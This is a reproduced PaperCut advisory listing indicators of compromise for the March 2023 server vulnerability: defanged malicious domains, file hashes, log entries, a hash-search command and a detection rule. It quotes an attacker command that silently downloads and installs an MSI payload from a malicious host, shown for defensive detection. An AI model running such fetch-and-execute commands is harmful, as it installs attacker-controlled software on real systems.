PaperCut vulnerability (March 2023) - Indicators of Compromise (IOCs)
Source: https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#faqs
How do I know if my server has been exploited?
We currently recommend looking for the following Indicators of Compromise (IOCs) to determine if it is likely that the vulnerability has been used to install malware on the system. Depending on your systems, logging and endpoint protection software you may be able to detect the following.
- If you see suspicious activity or security alerts in Antivirus, anti-malware and endpoint security software tooling.
- If you see suspicious PaperCut MF application log entries, ie:
- User “admin” logs into the administration interface
- Admin user “admin” modified the print script on the printer
- User “admin” updated the config key “…” (where the config key is not one you’ve deliberately changed)
- User “[setup-wizard]” modified a config key
- If your Application Server server logs happen to be in debug mode, check to see if there are lines mentioning
SetupCompletedat a time not correlating with the server installation or upgrade. Server logs can be found e.g. in[app-path]/server/logs/*.*whereserver.logis normally the most recent log file.
- Domains in DNS or web proxy logs:
- upd488[.]windowservicecemter[.]com/download/ld.txt
- upd488[.]windowservicecemter[.]com/download/AppPrint.msi
- upd488[.]windowservicecemter[.]com/download/a2.msi
- upd488[.]windowservicecemter[.]com/download/a3.msi
- anydeskupdate[.]com
- anydeskupdates[.]com
- netviewremote[.]com
- updateservicecenter[.]com
- windowcsupdates[.]com
- windowservicecentar[.]com
- windowservicecenter[.]com
- winserverupdates[.]com
- study[.]abroad[.]ge
- ber6vjyb[.]com
- 5[.]188[.]206[.]14
- upd488[.]windowservicecemter[.]com/download/update.dll
- New suspicious entries in SSH authorized keyfile.
- New print scripts in the setup. Review the ‘Scripting’ configuration of each printer (and device) in PaperCut MF/NG admin.
- SHA256 hashes of files on local system:
- setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb
- ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125
You can search the entire system for the hashes above
Get-ChildItem "_search_location_" -Recurse | Get-FileHash | Where-Object hash -eq _hash_here_ | Select pathSimply replace _search_location_ with what directory you wish to search and replace _hash_here_ with the hash of the file you wish to find. Search location can be the drive as well - at least IIRC.
- Powershell Scripts having similar content to:
```
cmd /c “powershell.exe -nop -w hidden Invoke-WebRequest ‘hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi’ -OutFile ‘setup.msi’ ” cmd /c “msiexec /i setup.msi /qn IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1”\\@@
```
- Detection via YARA Rule on SIEM:
```
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: “\\pc-app.exe”
Image|endswith:
- “\\cmd.exe”
- “\\powershell.exe”
condition: selection
level: high
falsepositives:
- Expected admin activity ```
If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior. In addition we recommend you implement your security response procedures and carry out best practices around potential compromise. Also see the “How do I retain my data when restoring my Application Server?” question below.
We will update this question with more details as we find more information from our customer base and security community.